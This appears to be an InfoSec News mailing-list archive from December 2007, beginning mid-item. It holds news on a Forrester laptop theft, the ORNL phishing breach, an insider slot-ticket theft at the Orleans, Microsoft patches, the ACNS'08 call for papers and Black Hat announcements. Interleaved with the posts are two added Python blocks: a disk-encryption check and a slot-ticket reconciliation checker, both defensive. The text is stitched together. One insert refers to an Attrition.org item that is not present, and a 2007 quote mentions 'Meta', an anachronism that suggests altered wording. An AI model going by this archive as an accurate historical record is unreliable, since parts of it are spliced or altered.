"When I was at Meta, we didn't do anything in our back office that we preached to others," he said. "It is symptomatic of all businesses. They really don't pay any attention to their own employees when warned of something wrong."

Forrester finds itself in good company when it comes to lost laptops. According to a recent study from the Ponemon Institute, lost and stolen laptops and mobile devices rank as the most frequent cause of a data breach: Almost half (49 percent) of data breaches in a 2007 study were due to lost or stolen laptops or other devices such as USB flash drives. That finding has been consistent throughout the years, Larry Ponemon, chairman and founder of the Ponemon Institute, told eWEEK when the study was released last week.

Forrester has reported the theft to the local police department and the Middlesex County District Attorney's Office in Massachusetts. Lemons said in the Forrester letter that the theft is an "isolated incident" and does not involve a breach of network security.

Forrester is providing those affected (excepting residents of New York, due to what Forrester said are state laws restricting the practice) with a full year of credit monitoring, including $25,000 identity theft insurance.

Forrester was not able to provide input for this article by the time it posted.
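The Attrition.org point in the item above (a drive is readable from a live CD unless its contents are encrypted with a key the thief does not have) turns into a simple posture check that an IT team can run on its Linux laptop fleet. What follows is an added example, not code from eWEEK, Attrition or Forrester. It parses the key="value" output of `lsblk --pairs` (the column names NAME, TYPE, FSTYPE, MOUNTPOINT and PKNAME are real lsblk columns; the sample output, device names and the BOOT_MOUNTS allow-list are constructed assumptions) and lists every mounted filesystem that is not stacked on a dm-crypt mapping, which is exactly the set of volumes a `mount /dev/hda1`-style recovery would expose. An OS login password or BIOS password does not change the result, since neither is consulted when the disk is read elsewhere.

```python
"""Flag mounted filesystems whose backing storage is readable without a key."""
import re
from typing import Dict, List

# Constructed sample of `lsblk -P -o NAME,TYPE,FSTYPE,MOUNTPOINT,PKNAME`
# (assumed layout of lsblk --pairs output); not taken from any real host.
SAMPLE_LSBLK = """\
NAME="sda" TYPE="disk" FSTYPE="" MOUNTPOINT="" PKNAME=""
NAME="sda1" TYPE="part" FSTYPE="vfat" MOUNTPOINT="/boot/efi" PKNAME="sda"
NAME="sda2" TYPE="part" FSTYPE="crypto_LUKS" MOUNTPOINT="" PKNAME="sda"
NAME="cryptroot" TYPE="crypt" FSTYPE="ext4" MOUNTPOINT="/" PKNAME="sda2"
NAME="sdb" TYPE="disk" FSTYPE="" MOUNTPOINT="" PKNAME=""
NAME="sdb1" TYPE="part" FSTYPE="ext4" MOUNTPOINT="/data" PKNAME="sdb"
NAME="sdc" TYPE="disk" FSTYPE="" MOUNTPOINT="" PKNAME=""
NAME="sdc1" TYPE="part" FSTYPE="vfat" MOUNTPOINT="/media/usb" PKNAME="sdc"
"""

PAIR_RE = re.compile(r'(\w+)="([^"]*)"')

# Mount points that by design hold no user data and normally stay unencrypted
# (assumption for this example; adjust to local policy).
BOOT_MOUNTS = {"/boot", "/boot/efi"}


def parse_lsblk_pairs(text: str) -> Dict[str, Dict[str, str]]:
    """Parse lsblk --pairs output into {NAME: {column: value}}."""
    devices: Dict[str, Dict[str, str]] = {}
    for line in text.splitlines():
        if not line.strip():
            continue
        fields = dict(PAIR_RE.findall(line))
        devices[fields["NAME"]] = fields
    return devices


def is_encrypted_at_rest(devices: Dict[str, Dict[str, str]], name: str) -> bool:
    """True if the device, or any ancestor in its PKNAME chain, is a dm-crypt mapping."""
    seen = set()
    while name and name not in seen:
        seen.add(name)
        dev = devices.get(name)
        if dev is None:
            return False
        if dev["TYPE"] == "crypt":
            return True
        name = dev["PKNAME"]
    return False


def unencrypted_mounts(text: str) -> List[str]:
    """Mount points whose data could be read by mounting the disk on another machine."""
    devices = parse_lsblk_pairs(text)
    findings = []
    for name, dev in devices.items():
        mountpoint = dev["MOUNTPOINT"]
        if not mountpoint or mountpoint in BOOT_MOUNTS:
            continue
        if not is_encrypted_at_rest(devices, name):
            findings.append(mountpoint)
    return sorted(findings)


if __name__ == "__main__":
    import subprocess
    try:
        # Real run on a Linux host; falls back to the constructed sample elsewhere.
        out = subprocess.run(
            ["lsblk", "-P", "-o", "NAME,TYPE,FSTYPE,MOUNTPOINT,PKNAME"],
            capture_output=True, text=True, check=True).stdout
    except (FileNotFoundError, subprocess.CalledProcessError):
        out = SAMPLE_LSBLK
    for mp in unencrypted_mounts(out):
        print("readable without a key:", mp)
```

In the constructed sample the root filesystem sits on a LUKS container and passes, while /data and the USB stick are plain partitions and are reported. The check only recognises dm-crypt (LUKS) stacking; filesystems with their own encryption layer, or BitLocker and FileVault volumes on other platforms, need a separate check.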
From alerts at infosecnews.org Fri Dec 7 01:13:55 2007
From: alerts at infosecnews.org (InfoSec News)
Date: Thu Apr 10 04:02:49 2008
Subject: [ISN] Air Force pushes cyber warrior training
Message-ID:

http://www.fcw.com/online/news/151014-1.html

By Peter Buxbaum
FCW.com
December 6, 2007

The Air Force is establishing a professional force of cyber operators and developing cyber career paths for officers, enlisted personnel and civilians. The new Air Force Cyber Command and the Air National Guard are among the focal points of the plan.

"We're asking ourselves, 'What is a cyber warrior?'" Col. Anthony Buntyn, who is in line to become a brigadier general, told an industry audience at the Air Force IT Day sponsored by AFCEA in McLean, Va., Dec. 5. "What skills and equipment do they need? We are developing basic criteria."

The Air Force intends to provide some basic cyber training to all who enter the service, said Maj. Gen. Charles Ickes, special assistant to the deputy chief of staff for operations, and plans and requirements at the Air National Guard. In addition, as many as 40,000 cyber warfare specialists will be trained as warriors, advocates and visionaries for cyber operations, Ickes said. The scope of the training involved will differ based on the assigned duties and could take six to 15 months. It could take seven to 10 years to develop the career cyber force the Air Force is envisioning, Ickes said.

"We're trying to look at the best way to integrate air, space and cyber operations in everything we do," Ickes added.

"Cyber operators need the same freedom to maneuver as warfighters in the air or on the sea or land," Buntyn said. "From a network standpoint, our priority is to ensure our networks are survivable under attack," Buntyn added.

Ickes said the Air Force is working with universities, the Air Force Academy and the Doctrine Center to develop programs and curricula for cyber trainees.
One result, he added, has been the development of a new Net Warfare Training course for enlisted personnel.

"The enlisted force will be performing the preponderance of this work," Ickes said. "We are trying to create a career path and to make this a dynamic opportunity. I think it could be a very appealing career field for young kids as they come into the military."

The officer force needs more broad training in the cyber area in addition to education about a particular area of expertise.

For Buntyn, connecting with private industry will be one key to developing the Air Force's cyber skills. Ickes said the Air National Guard will provide one conduit for the transfer of cyber knowledge and skills to Air Force personnel.

Buxbaum is a freelance writer in Bethesda, Md.

From alerts at infosecnews.org Fri Dec 7 01:14:08 2007
From: alerts at infosecnews.org (InfoSec News)
Date: Thu Apr 10 04:02:49 2008
Subject: [ISN] Cyber hackers hit ORNL; thousands potentially affected
Message-ID:

http://www.knoxnews.com/news/2007/dec/06/cyber-hackers-hit-ornl-visitor-data-potentially-ex/

By Frank Munger
Knoxville News Sentinel
December 6, 2007

OAK RIDGE - Oak Ridge National Laboratory was the target of a sophisticated cyber attack that potentially gave hackers access to the personal information of thousands of visitors to the lab from 1990 to 2004, the laboratory confirmed today.

ORNL Director Thom Mason informed lab staff members of the issue earlier this week and said the lab would attempt to notify as many persons as possible whose personal information may have been stolen. Lab spokesman Billy Stair said today about 12,000 letters had been sent to potential victims.
Mason outlined the general aspects of the attack, which included a number of phishing e-mails sent to staff members, but he concluded the note by saying: "Because of the sensitive nature of this event, the laboratory will be unable for some period to discuss further details until we better understand the full nature of this attack."

Phishing is the practice of sending official-looking e-mails to extract information from victims who believe them to be from legitimate institutions such as banks.

Mason told staffers that the attack appeared to be part of a coordinated attempt to gain access to computer networks at numerous laboratories and other institutions across the country. He said ORNL's cyber security team has been working nights and weekends to try to understand the nature of the attack.

A spokesman at Los Alamos National Laboratory, a weapons design laboratory in New Mexico, confirmed this afternoon that LANL also was attacked by hackers. Kevin Roark of Los Alamos would not discuss the hacking, except to say that it occurred on unclassified systems and was "significant and sophisticated." He said Los Alamos employees were notified Nov. 4.

The first potential corruption at ORNL occurred Oct. 29, lab officials said.

"Our review to date has shown that while every security system at ORNL was in place and in compliance, the hackers potentially succeeded in gaining access to one of the laboratory's non-classified data bases that contained personal information of visitors to the laboratory between 1990 and 2004," Mason said. "At this point we have determined that the thieves made approximately 1,100 attempts to steal data with a very sophisticated strategy that involved sending staff a total of seven phishing e-mails, all of which at first glance appeared legitimate. Investigators believe that 11 staff members opened the attachment, enabling hackers to infiltrate the system and remove data," he said.
Reconstructing the event will likely take weeks, if not longer, to complete, the ORNL director said.

According to Mason, the personal information potentially vulnerable would be names, dates of birth and social security numbers of lab visitors. Stair said the visitors would include scientists, university officials, industrial and business representatives, as well as members of the news media and many others who come to the national laboratory. He said it would not include young students who tour the laboratory.

More details as they develop online and in Friday's News Sentinel.

-=-

Related blog - Frank Munger's Atomic City Underground: Los Alamos also hacked.
http://blogs.knoxnews.com/knx/munger/2007/12/los_alamos_also_hacked.html

From alerts at infosecnews.org Fri Dec 7 01:14:21 2007
From: alerts at infosecnews.org (InfoSec News)
Date: Thu Apr 10 04:02:49 2008
Subject: [ISN] Thieves Inside the Machine
Message-ID:

http://www.lasvegassun.com/sunbin/stories/sun/2007/dec/06/566653097.html

By Liz Benston
Las Vegas Sun
December 06, 2007

High-tech thieves have discovered a new way to rip off slot machines - stealing more than $1 million from the Orleans before management shut down their computer-assisted heist.

Gaming regulators say the crime - one of the largest in years - shows a vulnerability in casino security that could lead to new surveillance standards.

The theft began in September 2006 and allegedly involved three slot workers who, over several months, manipulated software that prints slot machine payout tickets. They allegedly worked with two accomplices who posed as customers and cashed the tickets.

One defendant, slot technician Seferino Romero, pleaded guilty last month and will be sentenced in Clark County District Court on Jan. 24. Felony theft carries a maximum 10-year prison term. His attorney, Jeffrey Segal, said his client didn't mastermind the heist and has agreed to pay restitution of $100,000.
"I think that his actions subsequent to the conduct indicate that this is a person of good character who got caught up in something and realizes it was a mistake," Segal said. The Orleans incident shows that other casinos are similarly vulnerable to inside jobs by casino workers, security experts say. Employee theft - sometimes as simple as pocketing cash or chips - is a recurring problem in the cash-rich industry, which can corrupt the most trusted employees. Most crimes are not publicized by casinos and regulators are reluctant to discuss them for fear of tipping hieves to new techniques. Boyd Gaming Corp., which owns the Orleans, declined to discuss the particulars of this case, which is still in progress. "It could compromise the investigation" and assist other cheats, spokesman Rob Stillwell said. Four other defendants are awaiting arraignment next year on felony theft charges. The Gaming Control Board's enforcement chief says the Orleans incident was a new one to him, although it had a familiar ring to security experts. In this case, Orleans workers printed winning tickets on test machines in a back room, using software allowing the machines to mimic machines on the slot floor that had been turned off, investigators told the Sun. The tickets were for relatively small amounts - a few hundred dollars each - to escape the notice of casino bosses. Stealing from cashless machines is a new challenge for thieves. Casinos have turned from coin slot machines to ticket machines because they are easily played and maintained and had been considered more secure than old-generation coin slots, which skilled thieves could quickly compromise using mechanical tools such as magnets and metal wands. These newer thefts typically involve casino employees with access to sensitive areas of a casino's nerve center. And therein lies the problem - and the solution - for casinos. 
The slot technicians involved in the Orleans theft had appropriate access to the slot testing room but probably shouldn't have been allowed to tinker with the slot system that communicates with the machines on the floor without some interaction with other departments or higher-ups, said Jerry Markling, chief of the Gaming Control Board's enforcement division.

The good news for casinos is that "these are no longer easy scams" and can mostly be defeated with "strong internal controls," Markling said.

Michael Crump, a Fresno-based slot security consultant, said the Orleans case is typical of an emerging scam that is foiling casinos nationwide.

Many casinos rely on manufacturers to create security clearances for casino employees to access their slot tracking software, said Crump, a former executive with Boyd Gaming in Las Vegas. But those casinos may lose track of what clearances those employees have, allowing them to exploit the system later on, he said. Typically, employees who steal have stumbled upon access they shouldn't have, he said.

What's especially troubling for casinos is that some employees can cover their tracks by erasing transactions or signals that could red-flag auditors, he said.

The theft came to light during last month's Gaming Control Board meeting, when regulators discussed and approved a request by the South Point to put slot machines in a relatively remote part of its casino. Regulators worried about surveillance, and the casino offered to post either a security guard or a slot technician at the machines.

At the meeting, board member Randy Sayre said ticket machines may not be as secure as industry executives would like to believe.

"It's not just a matter of, we have got the room, we have the people to watch it, let's put (slots) out there," he said. "Technology is moving forward on us and the bad guys are getting smarter."
Regulators are loath to discuss details of how slot machines can be exploited, but indicated that, in a general sense, surveillance of the slots is important. Regulators generally require surveillance cameras on remote machines, though regulations specify dedicated cameras only for big jackpot machines. Some casinos don't train cameras on machines that have been shut down.

Cameras may not stop an actual theft, but they can be used to watch employees who might be breaking some procedure by, say, not being on the floor when they should, Crump said. Still, security clearances, rather than surveillance, are the real culprit in this case, he said.

Sayre says his concern isn't with the distance of any particular slot machine from the main casino floor but the possibility that, with the spread of slot machines into remote areas, a casino's security staff could be spread too thin. He says a standard policy for surveillance of remote machines would help casinos and regulators combat crooks.

Sayre wonders whether manning the machines with a gaming employee would be preferable to a guard, who is trained to spot underage gamblers but perhaps not as familiar with the technical aspects of the games and how they can be compromised by cheats.

Casinos lose an estimated 6 percent of revenue to internal theft, which is chalked up as a cost of doing business, Crump said. Many thieves prefer to ply their trade at smaller casinos outside of Nevada with cruder security mechanisms, he said. But Las Vegas eventually attracts the most accomplished and polished criminals, who try their hand here "to prove they can get away with it."

The Orleans scam was hardly the perfect crime, Markling said. "It was only a matter of time" before the thieves were caught because the casino's high-tech slot monitoring systems can detect deviations from the expected payout of any particular slot machine, he said.

All contents copyright 2005 Las Vegas SUN, Inc.
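Added example, not from the Sun article, Boyd Gaming or any slot-system vendor: the two controls the article's sources describe (tickets attributed to machines that were turned off or printed from a non-floor host, and per-machine payout drifting from the expected return), run over constructed ticket and machine-status records. Field names, host names, the sample records and the 92 percent expected return are assumptions.

```python
"""Reconciliation checks for a ticket-printing slot system (added example).

Constructed records; field names, host names and the 92% expected return
are assumptions, not taken from the article or any vendor's software.
"""
from collections import defaultdict
from dataclasses import dataclass
from datetime import datetime


@dataclass(frozen=True)
class MachineStatus:
    machine_id: str
    since: datetime  # moment this state began
    state: str       # "online", "offline" or "test"


@dataclass(frozen=True)
class Ticket:
    ticket_id: str
    machine_id: str      # machine the ticket is attributed to
    issued_at: datetime
    amount_cents: int
    issued_by_host: str  # slot-system host that generated the ticket


def state_at(history, machine_id, when):
    """Recorded state of machine_id at `when`: latest status not after `when`."""
    prior = [s for s in history if s.machine_id == machine_id and s.since <= when]
    if not prior:
        return "unknown"
    return max(prior, key=lambda s: s.since).state


def flag_tickets(tickets, history, floor_hosts):
    """Flag tickets floor monitoring should never see: attributed to a machine
    that was off (or in test) at issue time, or generated by a host outside
    the floor system, such as a back-room test terminal.
    Returns a list of (ticket_id, reason) pairs; a ticket may appear twice."""
    findings = []
    for t in tickets:
        state = state_at(history, t.machine_id, t.issued_at)
        if state != "online":
            findings.append((t.ticket_id, f"machine {t.machine_id} was {state} at issue time"))
        if t.issued_by_host not in floor_hosts:
            findings.append((t.ticket_id, f"issued from non-floor host {t.issued_by_host}"))
    return findings


def payout_deviation(tickets, coin_in_cents, expected_rtp, tolerance=0.05):
    """Per-machine payout versus expected return-to-player.
    coin_in_cents maps machine_id to total wagered. Many small tickets still
    add up, so a machine paying out more than expected_rtp + tolerance of its
    coin-in is returned with its observed ratio."""
    paid = defaultdict(int)
    for t in tickets:
        paid[t.machine_id] += t.amount_cents
    suspicious = {}
    for machine_id, wagered in coin_in_cents.items():
        if wagered <= 0:
            continue
        ratio = paid[machine_id] / wagered
        if ratio > expected_rtp + tolerance:
            suspicious[machine_id] = round(ratio, 3)
    return suspicious


# Constructed sample data (assumptions). M-101 is pulled from the floor on
# Sept. 10; tickets later appear in its name from a test-room host.
SAMPLE_STATUS = [
    MachineStatus("M-101", datetime(2006, 9, 1, 8, 0), "online"),
    MachineStatus("M-101", datetime(2006, 9, 10, 22, 0), "offline"),
    MachineStatus("M-102", datetime(2006, 9, 1, 8, 0), "online"),
]
SAMPLE_TICKETS = [
    Ticket("T-1", "M-101", datetime(2006, 9, 5, 14, 0), 2_500, "floor-sys-1"),
    Ticket("T-2", "M-101", datetime(2006, 9, 11, 3, 0), 31_000, "test-room-1"),
    Ticket("T-3", "M-102", datetime(2006, 9, 11, 3, 5), 28_000, "test-room-1"),
    Ticket("T-4", "M-102", datetime(2006, 9, 12, 12, 0), 1_500, "floor-sys-1"),
]
SAMPLE_COIN_IN = {"M-101": 10_000, "M-102": 100_000}
FLOOR_HOSTS = {"floor-sys-1", "floor-sys-2"}
EXPECTED_RTP = 0.92  # assumed expected return for both machines


def run_checks():
    """Run both checks over the sample data and return (flagged, deviating)."""
    return (flag_tickets(SAMPLE_TICKETS, SAMPLE_STATUS, FLOOR_HOSTS),
            payout_deviation(SAMPLE_TICKETS, SAMPLE_COIN_IN, EXPECTED_RTP))
```

In the sample, T-2 is caught twice (offline machine, test-room host), T-3 once (test-room host), and M-101's payout ratio of 3.35 against a 0.92 expectation is what a floor monitoring system would surface even if the individual tickets were small.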
From alerts at infosecnews.org Mon Dec 10 01:31:29 2007
From: alerts at infosecnews.org (InfoSec News)
Date: Thu Apr 10 04:02:49 2008
Subject: [ISN] Microsoft to Patch 3 Critical Flaws to Prevent System Hijacking
Message-ID:

http://www.eweek.com/article2/0,1895,2229965,00.asp

By Lisa Vaas
eWEEK.com
December 7, 2007

Vista is vulnerable to three critical security flaws, in IE, Windows and multimedia technologies, that could let attackers hijack systems.

Microsoft will put out seven security bulletins on Patch Tuesday, with three critical updates that could lead to systems getting hijacked via Windows, Internet Explorer, and/or Microsoft's multimedia frameworks and APIs.

Vista is vulnerable to all three of the critical flaws, although Microsoft noted in a table of affected software included in its monthly advance notification that updates are currently available.

One of the critical bulletins affects Windows, DirectX and DirectShow. DirectShow, a multimedia framework and API Microsoft designed to give developers a common interface for media across various programming languages, can be used to render or record media files on demand. DirectShow, which contains DirectX plugins for audio-signal processing and DirectX Video Acceleration to speed up video playback, is distributed as part of Microsoft's Platform SDK.

Windows Media Player uses DirectShow, as do most video applications on Windows. Many third-party video applications use DirectShow or a variant, as well.

Past security problems with DirectShow and DirectX have been sparse but serious. One critical flaw, fixed in October 2005, could have allowed an attacker to hijack a system. Microsoft also patched a critical DirectX flaw in 2003 that concerned an unchecked buffer that again could have led to a system takeover.

Microsoft's second critical advisory affects Windows and Windows Media Format Runtime. Another critical advisory for Windows Media Format Runtime came out one year ago, in December 2006.
That earlier flaw could have led to remote code execution.

eEye's Zero-Day Tracker as of Dec. 7 wasn't showing any known zero-day vulnerabilities for DirectX, DirectShow or Windows Media Format Runtime, so users will just have to wait until Patch Tuesday on Dec. 11 to find out more on Microsoft's media security fixes.

The third critical security update affects Windows and Internet Explorer.

Microsoft also plans to release six non-security, high-priority updates on Microsoft Update and Windows Server Update Services. The company will also release one non-security, high-priority update for Windows on Windows Update.

From alerts at infosecnews.org Mon Dec 10 01:32:28 2007
From: alerts at infosecnews.org (InfoSec News)
Date: Thu Apr 10 04:02:49 2008
Subject: [ISN] ACNS'08 CFP
Message-ID:

Forwarded from: Jianying Zhou

--------------------------
ACNS 2008: CALL FOR PAPERS
--------------------------

6th International Conference on Applied Cryptography and Network Security
http://acns2008.cs.columbia.edu/

Location: Columbia University, New York City, USA
Date: June 3-6, 2008
Submission Deadline: 14 January 2008 23:59:59 EST
Author Notification: 14 March 2008

General Chairs: Angelos Keromytis & Moti Yung
Program Chairs: Steven Bellovin & Rosario Gennaro
Publicity Chair: Jianying Zhou

[TOPICS]

Original papers on all aspects of applied cryptography and network security are solicited for submission to ACNS'08.
Topics of relevance include but are not limited to:

* Applied cryptography and provably-secure cryptographic protocols
* Design and analysis of efficient cryptographic primitives: public-key and symmetric-key cryptosystems, block ciphers, and hash functions
* Network security protocols
* Techniques for anonymity; trade-offs between anonymity and utility
* Integrating security into the next-generation Internet: DNS security, routing, naming, denial-of-service attacks, TCP/IP, secure multicast
* Economic fraud on the Internet: phishing, pharming, spam, and click fraud
* Email and web security
* Public key infrastructure, key management, certification, and revocation
* Security and privacy for emerging technologies: sensor networks, mobile (ad hoc) networks, peer-to-peer networks, bluetooth, 802.11, RFID
* Trust metrics and robust trust inference in distributed systems
* Security and usability
* Intellectual property protection: metering, watermarking, and digital rights management
* Modeling and protocol design for rational and malicious adversaries
* Automated analysis of protocols

Papers suggesting novel paradigms, original directions, or non-traditional perspectives are especially welcome.

As in previous years, there will be an academic track and an industrial track. Submissions to the academic track should emphasize research contributions, while submissions to the industrial track may focus on implementation and deployment of real-world systems. Submissions for the industrial track must clearly indicate this in the title. Proceedings for the academic track will be published in Springer-Verlag's Lecture Notes in Computer Science and will be available at the conference. Papers accepted to the industrial track will be published in a different venue.
[IMPORTANT DATES]

Submission Deadline: 14 January 2008 23:59:59 EST
Author Notification Date: 14 March 2008
Final Version Deadline: 4 April 2008
Conference: June 3-6, 2008

[PROGRAM COMMITTEE]

Masayuki Abe (NTT, Japan)
Ben Adida (Harvard University, USA)
Feng Bao (Institute for Infocomm Research, Singapore)
Lujo Bauer (CMU, USA)
Giampaolo Bella (University of Catania, Italy)
Steven Bellovin, co-chair (Columbia University, USA)
John Black (University of Colorado, USA)
Nikita Borisov (University of Illinois Urbana-Champaign, USA)
Colin Boyd (Queensland University of Technology, Australia)
Dario Catalano (University of Catania, Italy)
Debra Cook (Alcatel-Lucent Bell Labs, USA)
Alexander W. Dent (Royal Holloway, University of London, UK)
Nelly Fazio (IBM Research, USA)
Marc Fischlin (Darmstadt University of Technology, Germany)
Debin Gao (Singapore Management University, Singapore)
Rosario Gennaro, co-chair (IBM Research, USA)
Peter Gutmann (University of Auckland, New Zealand)
John Ioannidis (Packet General Networks, USA)
Stanislaw Jarecki (University of California Irvine, USA)
Ari Juels (RSA Laboratories, USA)
Kaoru Kurosawa (Ibaraki University, Japan)
Yehuda Lindell (Bar-Ilan University, Israel)
Moses Liskov (William and Mary College, USA)
Javier Lopez (University of Malaga, Spain)
Jelena Mirkovic (USC/ISI, USA)
David Naccache (Ecole Normale Superieure, France)
Alina Oprea (RSA Laboratories, USA)
Tom Shrimpton (Portland State University, USA)
Jonathan Smith (University of Pennsylvania, USA)
Angelos Stavrou (George Mason University, USA)
Xiaoyun Wang (Shandong University, China)
Nicholas Weaver (ICSI Berkeley, USA)
Steve Weis (Google, USA)
Tara Whalen (Dalhousie University, Canada)
Michael Wiener (Cryptographic Clarity, Canada)
Avishai Wool (Tel-Aviv University, Israel)
Diego Zamboni (IBM Research, Switzerland)
Jianying Zhou (Institute for Infocomm Research, Singapore)

[AUTHOR INSTRUCTIONS]

Submissions must be anonymous, with no author names, affiliations, acknowledgments, or obvious references. Submissions should be in English, in PDF format with all fonts embedded, typeset with 11pt font or larger, and using reasonable spacing and margins. They should not exceed 12 letter-sized pages, not counting the bibliography and appendices.

Papers should begin with a title, abstract, and an introduction that clearly summarizes the contributions of the paper at a level appropriate for a non-specialist reader. Papers should contain a scholarly exposition of ideas, techniques, and results, including motivation, relevance to practical applications, and a clear comparison with related work. Committee members are not required to read appendices, and papers should be intelligible without them. Submitted papers risk being rejected without consideration of their merits if they do not follow all the above guidelines.

Submissions must not substantially duplicate work that was published elsewhere, or work that any of the authors has submitted in parallel to any other conference or workshop that has proceedings. Plagiarism and double submissions will be dealt with harshly.

Authors will be asked to indicate whether their submissions should be considered for the best student paper award; any paper co-authored by a full-time student is eligible for this award. Authors of accepted papers must guarantee that their paper will be presented at the conference.

[ACNS Home: http://www.geocities.com/acns_home/]

From alerts at infosecnews.org Mon Dec 10 01:32:46 2007
From: alerts at infosecnews.org (InfoSec News)
Date: Thu Apr 10 04:02:49 2008
Subject: [ISN] When High Security is a CEO Perk
Message-ID:

http://www2.csoonline.com/exclusives/column.html?CID=33337

By Katherine Walsh
csoonline.com
Dec. 09, 2007

Quick quiz: When does the CEO of a big technology company actually love security?
Answer: When the executive protection team decides that the CEO needs to travel by private jet or limo anytime, anywhere, whether alone or with family members--for security reasons.

According to an analysis of proxy statements filed with the Securities and Exchange Commission by the U.S.'s largest technology companies, corporate jets and automobiles are sometimes considered not luxury items or fringe benefits, but part of the necessary cost of executive protection--not a bad perk for the holiday season.

At IBM, the country's largest technology company, "security practices provide that all air travel by the Chairman and CEO, including personal travel, be on Company aircraft," according to the most recent proxy statement. The CEO also is driven to and from work by IBM personnel in a car leased by IBM, which may also be used for non-business occasions--again, for security reasons.

In all, the company spent $373,187 on CEO S.J. Palmisano's personal use of company aircraft and $53,409 on personal security. This includes home security and monitoring systems, as well as security personnel for Palmisano and his family and the cost of hotels, meals, car services, airfare and salary for those security personnel. It's a decent chunk of Palmisano's total "other compensation" of $922,530.

Likewise, at Xerox, CEO Ann Mulcahy is required whenever feasible to use the company aircraft for travel for "security and personal safety." By this criterion, most of Mulcahy's "other compensation" can be classified as a security expense. Of the $296,026 listed under "all other compensation" for Mulcahy in the 2007 proxy statement, $193,300 was spent on personal use of the corporate aircraft, and another $18,679 went towards home security and other miscellaneous benefits. ("All other compensation" typically includes things like matching 401(k) contributions, home relocation assistance, financial planning and other perquisites.)
In terms of security perks, however, those numbers aren't even the big ones. Oracle reportedly spent a whopping $1,708,763 on security for CEO Larry Ellison. The proxy states that Ellison is required to have a home security system but is mum on most other details about what that $1.7 million includes.

And Dell reports spending $1,051,000 on personal and residential security for CEO Michael Dell in FY07. According to the proxy statement: "The Board believes that Mr. Dell's personal safety and security are of vital importance to the company's business and prospects, and therefore that all these costs are appropriate corporate business expenses." Security services are also provided to members of Dell's immediate family and to locations other than his primary residence.

Meanwhile, Cisco and Intel don't even mention the words "security" or "executive protection" in the proxy statement section on executive compensation.

So does the fact that Oracle reportedly spent $1.7 million protecting its chief executive, Xerox spent less than $300,000, and Cisco doesn't mention security at all mean that Oracle is the most paranoid technology company--or that Ellison is the safest CEO?

Of course not. For one thing, companies have vastly different interpretations of how they're supposed to calculate and report executive protection costs. Dell and Oracle do consider personal use of the corporate aircraft to be part of executive compensation--they just don't state that they consider it a security expense, as do IBM and Xerox.

Second, different companies and CEOs have different needs for security. "There is no one piece of security that should, without question, be implemented in every executive protection strategy," says Tim Horner, managing director at Kroll. Threat levels vary across company and industry, and companies must individualize their executive protection strategies as much as possible. (For in-depth coverage, see "The Six Things You Need to Know About Executive Protection.")
The threat environment of a particular corporation or CEO is dependent on a variety of factors, says Arnette Heintze, a retired U.S. Secret Service agent and now a security advisor at Hillard Heintze. One of those factors is corporate culture. "The CEO of a defense contractor might be exposed to greater risk through international travel than the CEO of a restaurant chain in the United States," he says.

Who the individual is also plays a big part in determining what to spend on executive protection. Heintze gives the example of celebrity CEO (now chairman) Bill Gates of Microsoft. "The security concerns there are not an issue so much because of the company and the industry, but because of the high profile of the executive," says Heintze. "Executive security can't be viewed just in one box."

So just how much money does Microsoft spend on protecting its top executives? Ironically, the company's proxy statement is completely silent on the matter. And that might just make it the most paranoid tech company of all.

From alerts at infosecnews.org Mon Dec 10 01:33:06 2007
From: alerts at infosecnews.org (InfoSec News)
Date: Thu Apr 10 04:02:49 2008
Subject: [ISN] UCSB Hosts Largest Computer Hacking Competition Ever
Message-ID:

http://www.independent.com/news/2007/dec/08/ucsb-hosts-largest-computer-hacking-competition-ev/

By Matt Kettmann
December 8, 2007

The world's largest computer hacking competition ever went down at UCSB on Friday, December 7, with 35 teams from nine countries logging in from their home bases and trying to take down each other's mock websites. Hosted by UCSB's Department of Computer Science, where the event's founder and coordinator Giovanni Vigna runs one of the more respected computer security programs in the world, it was the sixth time the International Capture the Flag (iCTF) battle had been waged in five years. "This is the biggest hacking competition ever," said Vigna. "You can bet on that."
By the time the dust settled on the all-day event, a team from Milan, Italy called the Chocolate Makers emerged victorious, but only after facing tough competition from Russians, Germans, Americans, Argentines, Austrians, Australians, Indians, and the French. (See the winner announcement here and final scores here.)

The online war works as follows: Vigna and his upper-level graduate students create a mock website with a half dozen section pages. In the morning, every team is given the same website, and must begin analyzing the structure immediately. Within minutes, they are blocking the website's security holes while other team members (typically teams have around 20 students on them) begin attacking the other websites' section pages. The scoring system, which is technically a secret for fear of being hacked, allocates points for both successful attacks (where a flag is captured) and defenses. This year, it also gave points for answering questions about computer security, which ranged from programming techniques to humorous trivia.

That trivia system was actually hacked this year, apparently accidentally, by the team WCSC from the University of South Florida in Tampa, scoring them 35,000 points in one swoop. That gave them a huge bump in the battle's last hour, putting them briefly in first place. But they ended up finishing fifth overall.

[...]

From alerts at infosecnews.org Mon Dec 10 01:33:25 2007
From: alerts at infosecnews.org (InfoSec News)
Date: Thu Apr 10 04:02:49 2008
Subject: [ISN] Black Hat end of year announcements
Message-ID:

Forwarded from: jmoss

Happy Holidays from Black Hat!

You are receiving this email because you have attended a Black Hat Briefings in the past, and I want to let you know what you can expect from Black Hat in the future.
BRIEFINGS AND TRAININGS
http://www.blackhat.com/

Black Hat is proud to be holding Trainings and Briefings in Washington D.C., Amsterdam, Las Vegas, Japan, and a mystery location in 2008. Please mark your calendars!

NEW: An enhancement to all Black Hat Briefings allows all attendees greater access to each presenter. Immediately following each session the presenters are available for an additional hour to take questions in a break out room. This allows you to not only have in depth conversations but also meet other attendees interested in the same topics you are.

DC 2008 Briefings & Training
February 18-21, Westin Washington DC City Center
New trainings include Defend the Flag by Microsoft, Side Channel Analysis and Countermeasures by Riscure, and TCP/IP Weapons School: Black Hat Edition by TaoSecurity.

Europe 2008 Briefings & Training
Now with three tracks per day of presentations!
March 25-28, Moevenpick Hotel Amsterdam City Centre, the Netherlands
New trainings include Understanding Stealth Malware by Joanna Rutkowska and Alexander Tereshkin, Side Channel Analysis and Countermeasures by Riscure, and Exploits 101 by Allen Harper.

USA 2008 Briefings & Training
This is the big one, thousands of people, seven tracks, BoF break outs, and more!
August 2-7, Caesars Palace Las Vegas

CALL for PAPERS
https://cfp.blackhat.com/

Black Hat is always looking for new and unique research, demonstrations and tools. If you have something you or your team would like to present please keep the following dates in mind.

D.C. 2008 Briefings CfP closes January 4
Europe 2008 Briefings CfP closes February 1
USA 2008 Briefings CfP will open February 1
Japan 2008 Briefings CfP will open May 1

RSS Announcements and Updates, News and more:
http://www.blackhat.com/BlackHatRSS.xml

TO REGISTER:
https://www.blackhat.com/html/bh-registration/bh-registration.html

To register for trainings or briefings please visit our registration site. Register early to take advantage of price discounts!
LINKEDIN GROUP:

